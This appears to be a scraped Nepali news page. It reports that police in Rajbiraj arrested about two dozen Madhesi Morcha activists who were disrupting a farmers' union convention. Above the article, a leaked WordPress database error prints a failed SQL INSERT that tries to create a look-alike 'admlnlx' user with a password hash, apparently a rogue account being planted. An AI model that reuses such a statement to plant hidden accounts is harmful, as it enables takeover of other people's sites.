WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlnIU1T6w2/KqL2.xejTWbDwBV1dbo/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 20:10:52', '', 'admlnlx', 'admlnlx')
राजविराज, माघ २८-
नेपाल मजदुर किसान पार्टीको जनवर्गीय संगठन नेपाल क्रान्तिकारी किसान संघको राजविराजमा भएको दोस्रो राष्ट्रिय अधिवेशन बिथोल्न खोज्ने मधेसी मोर्चाका दुई दर्जन नेता–कार्यकर्तालाई शुक्रबार प्रहरीले पक्राउ गरेको छ ।
संघको उद्घाटनसत्र सुरु हुनैलाग्दा नारा–जुलुससहित पुगेका मधेसी मोर्चाका कार्यकर्ताले कार्यक्रम बिथोल्न खोजेपछि प्रहरीले उनीहरुलाई पक्राउ गरेको हो । मोर्चाका कार्यकर्ताहरुले संघको ब्यानर र झन्डा च्यात्दै मजदुर किसान पार्टीका अध्यक्ष नारायणमान बिजुक्छेविरुद्ध नाराबाजी गर्न थालेपछि कार्यक्रमस्थलमा ठूलो संख्यामा प्रहरी परिचालन गरिएको छ । पक्राउ पर्नेमा राष्ट्रिय मधेस समाजवादी पार्टीका जिल्ला अध्यक्ष सतिसकुमार सिंह, सद्भावना पार्टीका ३ नम्बर क्षेत्रीय अध्यक्ष लक्ष्मण यादव, कैलु रामलगायत दुई दर्जनजति नेता–कार्यकर्ता छन् ।